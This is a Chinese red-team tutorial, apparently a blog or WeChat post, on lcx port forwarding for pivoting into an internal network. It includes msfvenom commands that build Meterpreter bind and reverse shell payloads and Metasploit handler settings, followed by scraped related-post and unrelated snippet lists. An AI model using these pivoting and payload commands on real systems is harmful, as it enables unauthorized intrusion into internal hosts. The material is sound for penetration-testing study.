0x01 正向端口转发

在边界机器上执行端口转发命令，让来自指定端口的流量全部转发到内网指定IP指定端口上。

这里关闭了防火墙，在正常情况下请使用netsh来对端口进行开放，详细步骤可以参考以前的文章【使用netsh来进行端口转发】

这里我们将本地53端口的全部流量都转发到内网机器的3389端口，从而进行远程连接

lcx.exe -tran 53 192.168.222.137 3389

当然在执行完之后，我们再确定一下端口是否已经启用

然后我们在本地来进行远程连接

0x02 反向端口转发

如果我们只有当前目标的webshell，并没有边界主机可以利用的话，就可以通过反向端口转发来使内网流量都转发到自己的主机上。

注：这里我们用边界机器win08来代替我们的本地主机

首先在本地机器执行监听

lcx.exe -listen 53 1234

使用netstat -ano 确保端口已经启用

然后在目标机器(win7)上执行

lcx.exe -slave 192.168.222.175 53 127.0.0.1 3389

即将本地3389端口的流量都转发到win8机器的53端口上，如果有边界服务器可以利用的话，则在边界服务器执行该命令，将对应的IP和端口改变就可以了。

然后在本地(win8)远程连接即可

0x03 msf正向shell

使用lcx执行正向端口转发，去连接内网的meterpreter

首先先用msf生成一个马

msfvenom -p windows/x64/meterpreter/bind_tcp lport=53 -f exe >> 123.exe

然后去边界机器执行lcx的正向端口转发，将来自53端口的流量全部转发到内网的meterpreter上

lcx.exe -tran 53 192.168.222.137 53

然后去内网机器运行我们的马

再回到Ubuntu上，对其进行监听，监听边界机器的53端口即可

use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 53
set rhost 192.168.222.175
run

0x04 msf反向shell

反向shell也是一样的道理

首先先生成我们的马，这里回连的IP和端口都是边界机器的

msfvenom -p windows/x64/meterpreter/reverse_tcp lport=53 lhost=192.168.222.175  -f exe >> 123.exe

然后到边界机器上执行监听

lcx.exe -listen 53 8888

到内网机器执行我们的马

回到Ubuntu上，对其进行监听

use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lhost 192.168.222.175
set lport 8888
exploit -j

可见第一次并没有成功弹回session，这个使由于lcx的原因，多尝试两次就可以了

文章首发公众号：无心的梦呓(wuxinmengyi)

这是一个记录红队学习、信安笔记，个人成长的公众号

扫码关注即可

lcx端口转发的更多相关文章

LCX端口转发实现内网突破
工具:lcx.exe 原理:当目标主机仅开放了web服务,而该服务又仅能供内网用户使用,外网用户根本无法直接访问.因此想要让外网用户能能够访问局域网中的系统服务,必须进行端口映射等操作才行.其原理就是 ...
lcx端口转发 linux版
一.端口转发使用 1.攻击机上执行以下命令 ./lcx -p1 -p2 -m 在本地监听3389端口,并将发送到本机3389端口的数据传递到本机2222端口 2.跳板机上执行以下命令 ./lcx -h ...
lcx 端口转发
1.查看3389端口开放情况: REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStati ...
[内网渗透]lcx端口转发
0x01 简介 lcx是一款端口转发工具,有三个功能: 第一个功能将本地端口转发到远程主机某个端口上第二个功能将本地端口转发到本地另一个端口上第三个功能是进行监听并进行转发使用 Lcx使用的前提是 ...
linux下内网端口转发工具：linux版lcx [实现远程内网维护]
这个工具以前使用的初衷是内网渗透,需要将内网ssh端口转发到外网服务器上.但这个工具同样适用于运维工程师进行远程内网维护. 当然这一切的前提是内网可以访问外网,检测方法当然就是直接ping 一个外网I ...
端口转发 Port Forwarding （一）
0x00First 最近发现一些好用的端口转发工具和技巧,计划认真梳理一下 SSH.NC.LCX.EW.FRP 0x01 SSH隧道端口转发目前利用SSH隧道(SSH tunneling)进行端口转 ...
端口转发工具lcx使用两类
lcx是一款强大的内网端口转发工具,用于将内网主机开放的内部端口映射到外网主机(有公网IP)任意端口.它是一款命令行工具,当然也可以在有权限的webshell下执行,正因如此lcx常被认为是一款黑客入 ...
[转]otunnel：一个和lcx差不多的端口转发的工具
这是一个采用Golang编写的和lcx差不多的端口转发的工具,用来突破内网环境项目地址 ooclab/otunnel 下载地址(内涵各大平台) http://dl.ooclab.com/otunne ...
LCX端口内网映射转发
这几天在渗透一家奶茶店的时候, 使用溢出攻击获得了奶茶店shell, 截屏以后发现该电脑有安装sqlserver, 但是数据库无法远程连接, 所以我决定使用端口映射工具突破端口连接限制: 我的机器地址 ...

随机推荐

版本管理·玩转git(快速入门git)
如果你用过Word文档写过文章,那么你一定会有这样的经历. 我觉得某一段或者某一句写得不够好,但是,删掉之后我可能会后悔把它删掉了,进而又想把删掉的段落找回来,这时,你想到了一个好办法,将每次的修改都 ...
随笔编号-07 JS针对时间操作
//获取完整的当前日期 var date=new Date; var year=date.getFullYear(); var month=date.getMonth()+1; month =(mon ...
Spring学习之旅(九)--SpringMVC高级技术
文件上传在 Web 应用中,允许用户上传文件是很常见的需求.文件上传通常是采用 multipart 格式,而 DispatcherServlet 并没有任何解析 multipart 请求数据的功能, ...
ECMAScript---变量
上上篇我们说到ESMAScript是JS的语法规划,JS中的变量.数据类型.语法规范.操作语句.设计模型等都是ES规定的,现在咱们聊一下JS中的变量和常量变量(variable) 它不是具体值,只是 ...
ionic App 解决android端在真机上 tab处于顶部的Bug
在app.js 页面中添加以下代码 .config(function($stateProvider, $urlRouterProvider,$ionicConfigProvider) { $ionic ...
IDEA实用教程（一）
IDEA实用教程一. IDEA简介简介 IDEA 全称IntelliJ IDEA,是java语言开发的集成环境. IDEA是JetBrains公司的产品. JetBrains官网 : https: ...
在.net core wep项目中使用Session
第1步:添加包引用 Install-Package Microsoft.AspNetCore.Session 第2步:添加代码启用Session 在项目Startup.cs文件的ConfigureSe ...
洛谷 P1640 【连续攻击游戏】
question bank :luogu question Number :1640 title :Continuous attacking game link :https://www.luogu. ...
(一)spring aop的两种配置方式。
sring aop的方式有两种:(1)xml文件配置方式(2)注解的方式实现,我们可以先通过一个demo认识spring aop的实现,然后再对其进行详细的解释. 一.基于注解的springAop配置 ...
POJ - 3026 Borg Maze BFS加最小生成树
Borg Maze 题意: 题目我一开始一直读不懂.有一个会分身的人,要在一个地图中踩到所有的A,这个人可以在出发地或者A点任意分身,问最少要走几步,这个人可以踩遍地图中所有的A点. 思路: 感觉就算 ...

lcx端口转发

目录